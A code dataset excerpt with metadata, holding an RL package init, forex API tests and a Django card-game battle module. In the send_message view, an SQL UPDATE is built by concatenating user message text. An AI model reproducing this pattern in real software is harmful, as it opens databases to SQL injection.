efficient_rl/agents/__init__.py
|
rlagywjd802/efficient_rl
|
6a82bfc10d814f5d36a7c211d645aa35ea380acf
|
[
"MIT"
] | 2
|
2020-12-30T07:39:38.000Z
|
2021-04-12T14:57:13.000Z
|
import efficient_rl.agents.oo_mdp_learner
from efficient_rl.agents.BaseAgentClass import BaseAgent
from efficient_rl.agents.RmaxBaseClass import RmaxBaseAgent
from efficient_rl.agents.RmaxClass import Rmax
from efficient_rl.agents.FactoredRmaxClass import FactoredRmax
from efficient_rl.agents.QLearningClass import QLearning
from efficient_rl.agents.DOORmaxClass import DOORmax
| 47.375
| 62
| 0.894459
| 49
| 379
| 6.734694
| 0.408163
| 0.233333
| 0.360606
| 0.381818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068602
| 379
| 7
| 63
| 54.142857
| 0.934844
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
225d26ce6baf557171c3543011dd8766d9262d5e
| 2,303
|
py
|
Python
|
tests.py
|
rudimk/fixerpy
|
59cd9c93981cf4d4320f4256fe789147dfff66b4
|
[
"Apache-2.0"
] | null | null | null |
tests.py
|
rudimk/fixerpy
|
59cd9c93981cf4d4320f4256fe789147dfff66b4
|
[
"Apache-2.0"
] | 1
|
2017-08-26T12:45:07.000Z
|
2017-08-26T13:38:18.000Z
|
tests.py
|
rudimk/fixerpy
|
59cd9c93981cf4d4320f4256fe789147dfff66b4
|
[
"Apache-2.0"
] | null | null | null |
from fixerpy import Converter
def testLatestRates():
c = Converter()
latestRates = c.getLatestRates()
if latestRates:
assert True
else:
assert False, "Current forex rates not retrieved."
if 'date' in latestRates:
assert True
else:
assert False, "The date is missing."
if latestRates['base'] == 'EUR':
assert True
else:
assert False, "The base rate is not EUR."
if 'rates' in latestRates:
assert True
else:
assert False, "The exchange rates are missing."
def testLatestRatesWithBase():
c = Converter(baseCurrency='USD')
latestRates = c.getLatestRates()
if latestRates:
assert True
else:
assert False, "Current forex rates not retrieved."
if 'date' in latestRates:
assert True
else:
assert False, "The date is missing."
if latestRates['base'] == 'USD':
assert True
else:
assert False, "The base rate isn't USD."
if 'rates' in latestRates:
assert True
else:
assert False, "The exchange rates are missing."
def testHistoricalRates():
c = Converter(queryDate='2017-01-01')
historicalRates = c.getHistoricalRates()
if historicalRates:
assert True
else:
assert False, "Historical forex rates not retrieved."
if 'date' in historicalRates:
assert True
else:
assert False, "The date is missing."
if historicalRates['base'] == 'EUR':
assert True
else:
assert False, "The base rate is not EUR."
if 'rates' in historicalRates:
assert True
else:
assert False, "The exchange rates are missing."
def testHistoricalRatesWithBase():
c = Converter(queryDate='2017-01-01', baseCurrency='USD')
historicalRates = c.getHistoricalRates()
if historicalRates:
assert True
else:
assert False, "Historical forex rates not retrieved."
if 'date' in historicalRates:
assert True
else:
assert False, "The date is missing."
if historicalRates['base'] == 'USD':
assert True
else:
assert False, "The base rate isn't USD."
if 'rates' in historicalRates:
assert True
else:
assert False, "The exchange rates are missing."
| 28.432099
| 61
| 0.620929
| 260
| 2,303
| 5.5
| 0.161538
| 0.111888
| 0.156643
| 0.223776
| 0.886014
| 0.886014
| 0.848252
| 0.848252
| 0.848252
| 0.848252
| 0
| 0.009798
| 0.290925
| 2,303
| 81
| 62
| 28.432099
| 0.865891
| 0
| 0
| 0.831169
| 0
| 0
| 0.231771
| 0
| 0
| 0
| 0
| 0
| 0.415584
| 1
| 0.051948
| false
| 0
| 0.012987
| 0
| 0.064935
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
58c004f50cde44fb8358ca6d7b1f2d52b5e7022b
| 65,222
|
py
|
Python
|
mysite/tcgcreator/battle_det.py
|
jidpn/tcgcreator_eternal_beta
|
4a10a5a36eeb161cf35a3488453c00325d78ae83
|
[
"MIT"
] | null | null | null |
mysite/tcgcreator/battle_det.py
|
jidpn/tcgcreator_eternal_beta
|
4a10a5a36eeb161cf35a3488453c00325d78ae83
|
[
"MIT"
] | null | null | null |
mysite/tcgcreator/battle_det.py
|
jidpn/tcgcreator_eternal_beta
|
4a10a5a36eeb161cf35a3488453c00325d78ae83
|
[
"MIT"
] | null | null | null |
from .models import (
Deck,
Duel,
Grave,
Hand,
CostWrapper,
Config,
Lock,
)
from html import escape
from django.http import HttpResponse
from django.utils.html import format_html
from django.db.models import Q
from .duel import DuelObj
from django.db import connection
import json
import copy
from time import time
from pprint import pprint
from .battle_functions import init_duel
def send_message(request):
room_number = int(request.POST["room_number"])
duel = Duel.objects.get(id=room_number)
duelobj = DuelObj(room_number)
duelobj.duel = duel
duelobj.room_number = room_number
duelobj.in_execute = False
user_1 = None
user_2 = None
if "ID" in request.COOKIES :
ID = request.COOKIES["ID"]
else:
ID = ""
if duel.guest_flag == False:
user_1 = duel.user_1
ID1 = "-1"
else:
ID1 = duel.guest_id
if duel.guest_flag2 == False:
user_2 = duel.user_2
ID2 = "-1"
else:
ID2 = duel.guest_id2
if request.user != user_1 and request.user != user_2 :
if (ID1 == ID and duel.guest_flag) or (ID2 == ID and duel.guest_flag2):
pass
else:
return HttpResponse("error")
if request.user == user_1 or (ID1 == ID and duel.guest_flag is True):
duelobj.user = 1
user = 1
if request.user == user_2 or (ID2 == ID and duel.guest_flag2 is True):
duelobj.user = 2
user = 2
if user == 1:
if duel.guest_flag is False:
tmp = user_1.first_name + ":「" + request.POST["message"] + "」\n"
else:
tmp = duel.guest_name + ":「" + request.POST["message"] + "」\n"
else:
if duel.guest_flag2 is False:
tmp = user_2.first_name + ":「" + request.POST["message"] + "」\n"
else:
tmp = duel.guest_name2 + ":「" + request.POST["message"] + "」\n"
tmp = format_html(escape(tmp))
log_turn = duel.log_turn + tmp
log = duel.log + tmp
message_log = escape(duel.message_log) + tmp
current_log = escape(duel.current_log) + tmp
cursor = connection.cursor()
cursor.execute(
"update tcgcreator_duel set log_turn = '"
+ log_turn
+ "',log = '"
+ log
+ "',current_log = '"
+ current_log
+ "',message_log = '"
+ message_log
+ "' where id = "
+ str(room_number)
)
return_value = {}
return_value["log"] = log_turn
return_value["message_log"] = message_log
return_value["current_log"] = current_log
return HttpResponse(json.dumps(return_value))
def battle_det(request, duelobj=None, choices=None):
room_number = int(request.POST["room_number"])
lock = Lock.objects.get()
if duelobj is None:
duel = Duel.objects.get(id=room_number)
duelobj = DuelObj(room_number)
duelobj.duel = duel
duelobj.room_number = room_number
duelobj.in_execute = False
tmp_flag = True
else:
duel = duelobj.duel
tmp_flag = False
if "ID" in request.COOKIES :
ID = request.COOKIES["ID"]
else:
ID = ""
ID1 = duel.guest_id
ID2 = duel.guest_id2
user_1 = duel.user_1
user_2 = duel.user_2
if (user_1 is not None and request.user == user_1) or (ID1 == ID and duel.guest_flag):
user = 1
other_user = 2
elif (user_2 is not None and request.user == user_2) or (ID2 == ID and duel.guest_flag2):
user = 2
other_user = 1
else:
return HttpResponse("error")
if duel.winner == 0:
if user == 1:
if duel.guest_flag is True and duel.guest_name == "":
return HttpResponse("choose_name")
if duel.deck_choose_flag1 is True and duel.is_ai is False:
return HttpResponse("choosing_deck")
if duel.is_ai is False and duel.deck_choose_flag2 is True or (duel.guest_flag2 is True and duel.guest_name2 == ""):
config = Config.objects.get();
limit_time = config.limit_time
if time() - duel.time_2 > limit_time:
duelobj.win_the_game()
return HttpResponse("true")
return HttpResponse("waiting_choosing_deck")
if user == 2:
if duel.guest_flag2 is True and duel.guest_name2== "":
return HttpResponse("choose_name")
if duel.deck_choose_flag2 is True:
return HttpResponse("choosing_deck")
if duel.deck_choose_flag1 is True or (duel.guest_flag is True and duel.guest_name == ""):
config = Config.objects.get();
limit_time = config.limit_time
if time() - duel.time_1 > limit_time:
duelobj.win_the_game()
return HttpResponse("true")
return HttpResponse("waiting_choosing_deck")
if "wait_ai" in request.POST:
if duel.user_turn == 2 and duel.ask == 0:
decks = Deck.objects.all()
graves = Grave.objects.all()
hands = Hand.objects.all()
duelobj.user = 1
duelobj.other_user = 2
duelobj.init_all(1,2, room_number)
return battle_det_return_org_ai(
duelobj, decks, graves, hands, 1, 2, choices, room_number
)
else:
return HttpResponse("waiting")
# 相手番でも一回は様子をみる
if room_number == 1:
if lock.lock_1 is True and time() - lock.time_1 < 20:
if duel.is_ai == False or not "wait_ai" in request.POST or duel.user_turn == 1 or duel.ask != 0:
return HttpResponse("waiting")
else:
decks = Deck.objects.all()
graves = Grave.objects.all()
hands = Hand.objects.all()
user_1 = duel.user_1
user_2 = duel.user_2
if request.user != user_1 and request.user != user_2 and ID1 != ID and ID2 != ID:
if (ID1 == ID and duel.guest_flag) or (ID2 == ID and duel.guest_flag2):
pass
else:
return HttpResponse("error")
if request.user == user_1 or (ID1 == ID and duel.guest_flag):
duelobj.user = 1
user = 1
other_user = 2
if request.user == user_2 or (ID2 == ID and duel.guest_flag2):
duelobj.user = 2
user = 2
other_user = 1
duelobj.init_all(user, other_user, room_number)
return battle_det_return_org_ai(
duelobj, decks, graves, hands, user, other_user, choices, room_number
)
else:
lock.lock_1 = True
lock.time_1 = time();
lock.save()
elif room_number == 2:
if lock.lock_2 is True and time() - lock.time_2 < 20:
if duel.is_ai == False or not "wait_ai" in request.POST or duel.user_turn == 1 or duel.ask != 0:
return HttpResponse("waiting")
else:
decks = Deck.objects.all()
graves = Grave.objects.all()
hands = Hand.objects.all()
user_1 = duel.user_1
user_2 = duel.user_2
if request.user != user_1 and request.user != user_2 and ID1 != ID and ID2 != ID:
if (ID1 == ID and duel.guest_flag) or (ID2 == ID and duel.guest_flag2):
pass
else:
return HttpResponse("error")
if request.user == user_1 or (ID1 == ID and duel.guest_flag):
duelobj.user = 1
user = 1
other_user = 2
if request.user == user_2 or (ID2 == ID and duel.guest_flag2):
duelobj.user = 2
user = 2
other_user = 1
duelobj.init_all(user, other_user, room_number)
return battle_det_return_org_ai(
duelobj, decks, graves, hands, user, other_user, choices, room_number
)
else:
lock.lock_2 = True
lock.time_2 = time();
lock.save()
elif room_number == 3:
if lock.lock_3 is True and time() - lock.time_3 < 20:
if duel.is_ai == False or not "wait_ai" in request.POST or duel.user_turn == 1 or duel.ask != 0:
return HttpResponse("waiting")
else:
decks = Deck.objects.all()
graves = Grave.objects.all()
hands = Hand.objects.all()
user_1 = duel.user_1
user_2 = duel.user_2
if request.user != user_1 and request.user != user_2 and ID1 != ID and ID2 != ID:
if (ID1 == ID and duel.guest_flag) or (ID2 == ID and duel.guest_flag2):
pass
else:
return HttpResponse("error")
if request.user == user_1 or (ID1 == ID and duel.guest_flag):
duelobj.user = 1
user = 1
other_user = 2
if request.user == user_2 or (ID2 == ID and duel.guest_flag2):
duelobj.user = 2
user = 2
other_user = 1
duelobj.init_all(user, other_user, room_number)
return battle_det_return_org_ai(
duelobj, decks, graves, hands, user, other_user, choices, room_number
)
else:
lock.lock_3 = True
lock.time_3 = time();
lock.save()
user_1 = duel.user_1
user_2 = duel.user_2
if request.user != user_1 and request.user != user_2 and ID1 != ID and ID2 != ID:
if (ID1 == ID and duel.guest_flag) or (ID2 == ID and duel.guest_flag2):
pass
else:
return HttpResponse("error")
if request.user == user_1 or (ID1 == ID and duel.guest_flag):
duelobj.user = 1
user = 1
other_user = 2
if request.user == user_2 or (ID2 == ID and duel.guest_flag2):
duelobj.user = 2
user = 2
other_user = 1
if tmp_flag is True:
duelobj.init_all(user, other_user, room_number)
decks = Deck.objects.all()
graves = Grave.objects.all()
hands = Hand.objects.all()
turn = duel.user_turn
duelobj.update = False
# chain_user = duelobj.get_current_chain_user()
if choices is None:
choices = []
choices.append(None)
choices.append(10000)
if duel.winner != 0:
if room_number == 1:
lock.lock_1 = False
lock.save()
elif room_number == 2:
lock.lock_2 = False
lock.save()
elif room_number == 3:
lock.lock_3 = False
lock.save()
return battle_det_return_org(
duelobj, decks, graves, hands, user, other_user, choices, room_number
)
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
choices = duelobj.check_trigger(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
choices2 = duelobj.check_trigger(
decks, graves, hands, duel.phase, duel.user_turn, other_user, user
)
if (
duel.is_ai == False
and duel.appoint != user
and ((choices2[0] is not None and duelobj.check_wait(other_user)) or duel.ask > 0)
and ((turn == user and duel.ask != 2) or (turn != user and duel.ask == 2))
and duel.ask != 3
):
if room_number == 1:
lock.lock_1 = False
lock.save()
elif room_number == 2:
lock.lock_2 = False
lock.save()
elif room_number == 3:
lock.lock_3 = False
lock.save()
return battle_det_return(
duelobj, decks, graves, hands, user, other_user, choices, room_number
)
if (
duel.appoint == user
and duel.ask > 0
and ((turn == user and duel.ask == 2) or (turn != user and duel.ask == 1))
):
if room_number == 1:
lock.lock_1 = False
lock.save()
elif room_number == 2:
lock.lock_2 = False
lock.save()
elif room_number == 3:
lock.lock_3 = False
lock.save()
return battle_det_return(
duelobj, decks, graves, hands, user, other_user, choices, room_number
)
trigger_waiting = json.loads(duel.trigger_waiting)
if duel.in_trigger_waiting is True:
flag = False
else:
flag = True
if (
(duel.chain == 0 or duel.in_trigger_waiting is True)
and duel.trigger_waiting != "[]"
and duel.in_cost is False
and duel.ask == 0
):
if choices2[0] == None and choices[0] == None:
tmp_priority = min(choices[1],choices2[1])
elif choices2[0] == None:
tmp_priority = choices[1]
elif choices[0] == None:
tmp_priority = choices2[1]
else:
tmp_priority = duelobj.max2(choices,choices2)
duelobj.invoke_trigger_waiting(duel.trigger_waiting, tmp_priority)
duelobj.update = True
flag = True
flag_3 = False
ai_flag = False
while flag is True and (duel.winner == 0 and duel.winner_ai == 0):
flag = False
lll_flag = False
if duel.in_cost >= 1 and duelobj.in_execute is False and duel.appoint == user:
cost = CostWrapper.objects.get(id=duel.cost_det)
trigger = Trigger.objects.get(id=duel.current_trigger)
duelobj.pay_cost(cost, user,duel.chain,trigger,False)
duelobj.update = True
elif duel.in_cost is False:
choices = duelobj.check_trigger(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
while duel.winner == 0 and duel.winner_ai == 0:
if flag_3 is True:
break
flag_2 = False
if (choices[1] < choices2[1]) or (choices[0] is None and choices2[0] is not None):
duel.appoint = other_user
if duel.appoint == other_user:
while duel.winner == 0 and duel.winner_ai == 0:
choices2 = duelobj.check_trigger(
decks,
graves,
hands,
duel.phase,
duel.user_turn,
other_user,
user,
)
if duel.appoint == user:
break
if choices2[0] is not None and duelobj.check_wait(other_user) and duel.is_ai == False:
flag_2 = True
break
else:
choices = duelobj.check_trigger(
decks,
graves,
hands,
duel.phase,
duel.user_turn,
user,
other_user,
)
if choices[0] is not None and duelobj.check_wait(user):
#duel.current_priority = duelobj.max2(choices,choices2)
duelobj.update = True
if duel.none == False:
if duel.appoint == 1:
duel.appoint = 2
else:
duel.appoint = 1
duel.none = True
else:
duel.current_priority = duelobj.max2(choices,choices2)
duelobj.update = True
if duel.appoint == 1:
duel.appoint = 2
else:
duel.appoint = 1
duel.none = False
elif choices2[0] is not None and duelobj.check_wait(other_user) and duel.is_ai is False:
if ai_flag is False:
duel.current_priority = duelobj.max2(choices,choices2)
ai_flag = False
duelobj.update = True
if duel.none == False:
if duel.appoint == 1:
duel.appoint = 2
else:
duel.appoint = 1
duel.none = True
else:
duel.current_priority = duelobj.max2(choices,choices2)
duelobj.update = True
if duel.appoint == 1:
duel.appoint = 2
else:
duel.appoint = 1
duel.none = False
break
elif lll_flag is False:
lll_flag = True
else:
lll_flag = False
tmp_current_priority = duel.current_priority
duel.current_priority = duelobj.max2(choices,choices2)
if tmp_current_priority != duel.current_priority:
duelobj.update = True
if duel.current_priority == 0 and duel.in_trigger_waiting == 1 and duel.ask == 0 and duel.in_cost is False :
duelobj.invoke_trigger_waiting(duel.trigger_waiting)
if duel.in_cost is False:
if duel.is_ai == True:
ai_flag = True
duelobj.retrieve_chain(
decks,
graves,
hands,
duel.phase,
duel.user_turn,
user,
other_user,
)
if duel.chain == 0:
duelobj.invoke_after_chain_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
if duel.chain == 0:
duel.current_priority = 10000
if duel.timing3 is not None and duel.chain == 0:
if duel.timing3.timing_auto is True:
if duel.timing_fresh is False:
duel.timing3 = duel.timing3.next_timing
duel.timing_fresh = True
else:
duel.timing_fresh = False
if duel.timing is None and duel.timing2 is None and duel.timing3 is None:
duelobj.timing_mess = {}
if duel.mute == 1:
duelobj.unmute()
duel.mute = 0
elif duel.timing2 is not None and duel.chain == 0:
if duel.timing2.timing_auto is True:
if duel.timing_fresh is False:
duel.timing2 = duel.timing2.next_timing
duel.timing_fresh = True
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
else:
duel.timing_fresh = False
if duel.timing is None and duel.timing2 is None:
duelobj.timing_mess = {}
if duel.mute == 1:
duelobj.unmute()
duel.mute = 0
elif duel.timing is not None and duel.chain == 0:
if duel.timing.timing_auto is True:
if duel.timing_fresh is False:
duel.timing = duel.timing.next_timing
duel.timing_fresh = True
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
else:
duel.timing_fresh = False
if duel.timing is None:
duelobj.timing_mess = {}
if duel.mute == 1:
duelobj.unmute()
duel.mute = 0
duel.appoint = duel.user_turn
tmp = {}
duel.mess = json.dumps(tmp)
duel.cost_result = json.dumps(tmp)
duel.cost = json.dumps(tmp)
if duel.appoint == other_user and duel.is_ai == False:
flag_2 = True
break
elif duel.current_priority == 0 and duel.in_cost is False :
if (duel.ask == 0 ):
duelobj.invoke_trigger_waiting(duel.trigger_waiting)
pprint("BBB")
pprint(duel.chain)
duel.current_priority = 10000
if duel.chain != 0:
duelobj.retrieve_chain(
decks,
graves,
hands,
duel.phase,
duel.user_turn,
user,
other_user,
)
pprint(duel.chain)
if duel.chain == 0:
duelobj.invoke_after_chain_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
else:
duel.timing_fresh = False
if duel.chain == 0:
pprint("CCC")
duel.current_priority = 10000
if duel.timing3 is not None and duel.chain == 0:
if duel.timing3.timing_auto is True:
if duel.timing_fresh is False:
duel.timing3 = duel.timing3.next_timing
duel.timing_fresh = True
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
else:
duel.timing_fresh = False
if duel.timing is None and duel.timing2 is None and duel.timing3 is None:
duelobj.timing_mess = {}
if duel.mute == 1:
duelobj.unmute()
if duel.timing2 is not None and duel.chain == 0:
if duel.timing2.timing_auto is True:
if duel.timing_fresh is False:
duel.timing2 = duel.timing2.next_timing
duel.timing_fresh = True
else:
duel.timing_fresh = False
if duel.timing is None and duel.timing2 is None:
duelobj.timing_mess = {}
if duel.mute == 1:
duelobj.unmute()
elif duel.timing is not None and duel.chain == 0:
if duel.timing.timing_auto is True:
if duel.timing_fresh is False:
duel.timing = duel.timing.next_timing
duel.timing_fresh = True
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
else:
duel.timing_fresh = False
if duel.timing is None:
duelobj.timing_mess = {}
if duel.mute == 1:
duelobj.unmute()
duel.mute = 0
tmp = {}
duel.mess = json.dumps(tmp)
duel.cost_result = json.dumps(tmp)
duel.cost = json.dumps(tmp)
duel.appoint = duel.user_turn
if duel.appoint == other_user and duelobj.check_wait(other_user) and duel.is_ai == False:
flag_2 = True
break
if duel.appoint == user:
choices = duelobj.check_trigger(
decks,
graves,
hands,
duel.phase,
duel.user_turn,
user,
other_user,
)
choices2 = duelobj.check_trigger(
decks,
graves,
hands,
duel.phase,
duel.user_turn,
other_user,
user,
)
if (choices2[1] > choices[1] and choices2[1] is not None) or (
choices2[0] is not None and choices[0] is None
):
if not duelobj.check_wait(other_user) or duel.is_ai is True:
duel.current_priority = choices2[1]
duelobj.update = True
elif duel.none == False:
if duel.appoint == 1:
duel.appoint = 2
else:
duel.appoint = 1
duel.none = True
break
else:
duel.current_priority = duelobj.max2(choices,choices2)
if duel.appoint == 1:
duel.appoint = 2
else:
duel.appoint = 1
duel.none = False
duelobj.update = True
break
if choices[0] != "monster_trigger":
if (
choices[0] is None and choices2[0] is not None
): # and duel.appoint == duel.user_turn):
duelobj.update = True
if not duelobj.check_wait(other_user):
duel.current_priority = choices2[1]
elif duel.none == False:
if duel.appoint == 1:
duel.appoint = 2
else:
duel.appoint = 1
duel.none = True
break
else:
duel.current_priority = duelobj.max2(choices,choices2)
if duel.appoint == 1:
duel.appoint = 2
else:
duel.appoint = 1
duel.none = False
elif (
choices[0] is None
and choices2[0] is not None
and duel.appoint != duel.user_turn
):
duel.current_priority = choices2[1]
duelobj.update = True
elif duel.in_cost is False and \
(duel.ask == 0 and (
(choices[0] is None or choices[0] is True)
and choices2[0] is None
and duel.appoint == duel.user_turn
and duel.chain == 0
and (duel.timing is not None or duel.timing2 is not None or duel.timing3 is not None)
and choices[1] == 0
) or (
choices[1] == 0
and choices2[1] == 0
and (duel.timing is not None or duel.timing2 is not None or duel.timing3 is not None)
)):
duelobj.invoke_trigger_waiting(duel.trigger_waiting)
if duel.in_cost is False:
duelobj.retrieve_chain(
decks,
graves,
hands,
duel.phase,
duel.user_turn,
user,
other_user,
)
if duel.chain == 0:
duelobj.invoke_after_chain_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
if duel.chain == 0:
duel.current_priority = choices[1]
if duel.timing3 is not None:
if duel.timing3.timing_auto is True:
if duel.timing_fresh is False:
duel.timing3 = duel.timing3.next_timing
duel.timing_fresh = True
else:
duel.timing_fresh = False
if duel.timing3 is None and duel.timing2 is None and duel.timing is None:
duelobj.timing_mess = {}
if duel.mute == 1:
duelobj.unmute()
duel.mute = 0
elif duel.timing2 is not None:
if duel.timing2.timing_auto is True:
if duel.timing_fresh is False:
duel.timing2 = duel.timing2.next_timing
duel.timing_fresh = True
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
else:
duel.timing_fresh = False
if duel.timing2 is None and duel.timing is None:
duelobj.timing_mess = {}
if duel.mute == 1:
duelobj.unmute()
duel.mute = 0
elif duel.timing is not None:
if duel.timing.timing_auto is True:
if duel.timing_fresh is False:
duel.timing = duel.timing.next_timing
duel.timing_fresh = True
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
else:
duel.timing_fresh = False
if duel.timing is None:
duelobj.timing_mess = {}
if duel.mute == 1:
duelobj.unmute()
duel.mute = 0
tmp = {}
duel.mess = json.dumps(tmp)
duel.cost_result = json.dumps(tmp)
duel.cost = json.dumps(tmp)
duel.appoint = duel.user_turn
duel.appoint = duel.user_turn
pprint("DDD")
duel.current_priority = 10000
duelobj.update = True
elif (
(choices[0] is None or choices[0] is True)
and (choices2[0] is None
or choices[0] is True) and duel.chain == 0 and duel.in_cost is False):
duel.current_priority = choices[1]
duelobj.update = True
if duel.current_priority == 0 and duel.ask == 0:
pprint("EEE")
duel.current_priority = 10000
duelobj.invoke_trigger_waiting(duel.trigger_waiting)
if duel.in_cost is False:
duelobj.retrieve_chain(
decks,
graves,
hands,
duel.phase,
duel.user_turn,
user,
other_user,
)
if duel.chain == 0:
duelobj.invoke_after_chain_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
duel.appoint = duel.user_turn
choices = duelobj.check_trigger(
decks,
graves,
hands,
duel.phase,
duel.user_turn,
user,
other_user,
)
if choices[0] is None:
break
elif (
choices[0] is None
and choices2[0] is None
and duel.chain != 0
and duel.ask == 0
and duel.in_trigger_waiting is True
):
if (
(duel.chain == 0 or duel.in_trigger_waiting is True)
and duel.trigger_waiting != "[]"
and duel.in_cost is False
and duel.ask == 0
):
duel.current_priority = duelobj.max2(choices,choices2)
if duel.current_priority == 0:
pprint("FFF")
duel.current_priority = 10000
choices = duelobj.check_trigger(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
choices2 = duelobj.check_trigger(
decks, graves, hands, duel.phase, duel.user_turn, other_user, user
)
flag2 = duelobj.invoke_trigger_waiting(duel.trigger_waiting, duel.current_priority)
duelobj.update = True
if not flag2:
duel.in_trigger_waiting = False
continue
break
if (
choices[0] is None
and choices2[0] is None
and duel.chain != 0
and duel.ask == 0
and duel.in_cost is False
and duel.in_trigger_waiting is False
):
duelobj.check_eternal_effect(
decks,
graves,
hands,
duel.phase,
duel.user_turn,
user,
other_user,
)
duelobj.invoke_trigger_waiting(duel.trigger_waiting)
duelobj.update = True
if duel.in_cost is False:
duelobj.retrieve_chain(
decks,
graves,
hands,
duel.phase,
duel.user_turn,
user,
other_user,
)
if duel.chain == 0:
duelobj.invoke_after_chain_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
if duel.chain == 0:
duel.appoint = duel.user_turn
if duel.timing3 is not None:
if duel.timing3.timing_auto is True:
if duel.timing_fresh is False:
duel.timing3 = duel.timing3.next_timing
duel.timing_fresh = True
else:
duel.timing_fresh = False
if duel.timing is None and duel.timing2 is None and duel.timing3 is None:
duelobj.timing_mess = {}
if duel.mute == 1:
duelobj.unmute()
duel.mute = 0
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
if duel.timing2 is not None:
if duel.timing2.timing_auto is True:
if duel.timing_fresh is False:
duel.timing2 = duel.timing2.next_timing
duel.timing_fresh = True
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
else:
duel.timing_fresh = False
if duel.timing is None and duel.timing2 is None:
duelobj.timing_mess = {}
if duel.mute == 1:
duelobj.unmute()
duel.mute = 0
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
elif duel.timing is not None:
if duel.timing.timing_auto is True:
if duel.timing_fresh is False:
duel.timing = duel.timing.next_timing
duel.timing_fresh = True
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
else:
duel.timing_fresh = False
if duel.timing is None:
duelobj.timing_mess = {}
if duel.mute == 1:
duelobj.unmute()
duel.mute = 0
if duel.timing is None:
duelobj.timing_mess = {}
duelobj.check_eternal_effect(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
tmp = {}
duel.mess = json.dumps(tmp)
duel.cost_result = json.dumps(tmp)
duel.cost = json.dumps(tmp)
pprint("GGG")
duel.current_priority = 10000
choices = duelobj.check_trigger(
decks,
graves,
hands,
duel.phase,
duel.user_turn,
user,
other_user,
)
choices2 = duelobj.check_trigger(
decks,
graves,
hands,
duel.phase,
duel.user_turn,
other_user,
user,
)
if (
(duel.chain == 0 or duel.in_trigger_waiting is True)
and duel.trigger_waiting != "[]"
and duel.in_cost is False
and duel.ask == 0
and choices[0] is None
and choices2[0] is None
):
duel.current_priority = duelobj.max2(choices,choices2)
if duel.current_priority == 0:
pprint("HHH")
duel.current_priority = 10000
choices = duelobj.check_trigger(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
choices2 = duelobj.check_trigger(
decks, graves, hands, duel.phase, duel.user_turn, other_user, user
)
flag2 = duelobj.invoke_trigger_waiting(duel.trigger_waiting, duel.current_priority)
duelobj.update = True
if not flag2:
duel.in_trigger_waiting = False
'''
現状意味不明
if duelobj.check_wait(user) and duel.is_ai is True:
choices = duelobj.check_trigger(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
if choices[0]:
duel.appoint = 1
flag = False
flag_3 = True
break
'''
if flag_2 is True:
break
if( choices[0] is not None
and choices[0] is not True
and duel.appoint == user
and not duelobj.check_wait(user)):
duel.current_priority = choices[1]
duelobj.update = True
elif (
duel.in_cost is True
or
(choices[0] is not None
and choices[0] is not True
and duel.appoint == user
and duelobj.check_wait(user))
or duel.ask != 0
or duel.winner != 0
or duel.winner_ai != 0
):
break
if (
(duel.chain == 0 or duel.in_trigger_waiting is True)
and duel.trigger_waiting != "[]"
and duel.in_cost is False
and duel.ask == 0
):
duel.current_priority = duelobj.max2(choices, choices2)
if duel.current_priority == 0:
pprint("III")
duel.current_priority = 10000
choices = duelobj.check_trigger(
decks, graves, hands, duel.phase, duel.user_turn, user, other_user
)
flag2 = duelobj.invoke_trigger_waiting(duel.trigger_waiting, duel.current_priority)
duelobj.update = True
if not flag2:
duel.in_trigger_waiting = False
if choices[1] >= choices2[1]:
duel.appoint = 1
else:
duel.appoint = 2
if duelobj.update is True:
duelobj.save_all(user, other_user, room_number)
if room_number == 1:
lock.lock_1 = False
lock.save()
elif room_number == 2:
lock.lock_2 = False
lock.save()
elif room_number == 3:
lock.lock_3 = False
lock.save()
return battle_det_return(
duelobj, decks, graves, hands, user, other_user, choices, room_number
)
def battle_det_return(
